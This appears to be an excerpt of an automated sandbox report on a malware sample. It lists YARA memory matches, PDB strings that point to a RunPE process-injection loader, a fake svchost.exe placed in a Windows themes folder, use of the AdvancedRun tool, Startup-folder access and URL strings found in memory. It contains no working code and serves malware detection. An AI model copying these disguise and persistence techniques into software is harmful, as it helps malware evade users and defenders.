                      Source: Yara matchFile source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 481F404B.exe PID: 6392, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR
                      Source: VknMvPoCXZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: VknMvPoCXZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002udio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: osymbols\dll\System.Windows.Forms.pdbvH source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.PDBm source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbPROCESSOR_ARCHITEW6432=AMD64 source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe
                      Source: Binary string: ndel\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb9- source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: ease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb1 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe\??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbUSERDOMAIN=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbE> source: VknMvPoCXZ.exe, 00000001.00000000.400279978.0000000000AD8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb,U}< source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb@ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb\aero\Shell\4B6A7152\svch source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: ; .pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbCOMPUTERNAME=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb+ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: lib.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb9C-4437-8B11-F424491E3931}\Server source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbDriverData=C:\Windows\System32\Drivers\DriverData source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb(m source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbs source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbZS!'~< source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbpdbtry.pdb_ source: VknMvPoCXZ.exe, 00000001.00000002.568888200.0000000000A84000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbS source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb(m source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: o.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: symbols\dll\System.Windows.Forms.pdbvs. source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: iHC:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdbM( source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: svchost.PDB source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: svchost.exe, 00000004.00000002.565621441.0000028D9A48A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: svchost.exe, 00000004.00000002.565621441.0000028D9A48A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: svchost.exe, 00000004.00000002.563938277.0000028D9A40F000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000003.244837348.000000000082D000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.251876624.00000000055DD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: VknMvPoCXZ.exe, 00000001.00000003.251440194.00000000055D9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers19
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comicva
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comue
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
                      Source: VknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000003.247622790.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: VknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnf
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/5.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/curs
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoftc.
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comnt
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krB2
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krlea
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kropyw2-
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245836341.00000000055EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comnm
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
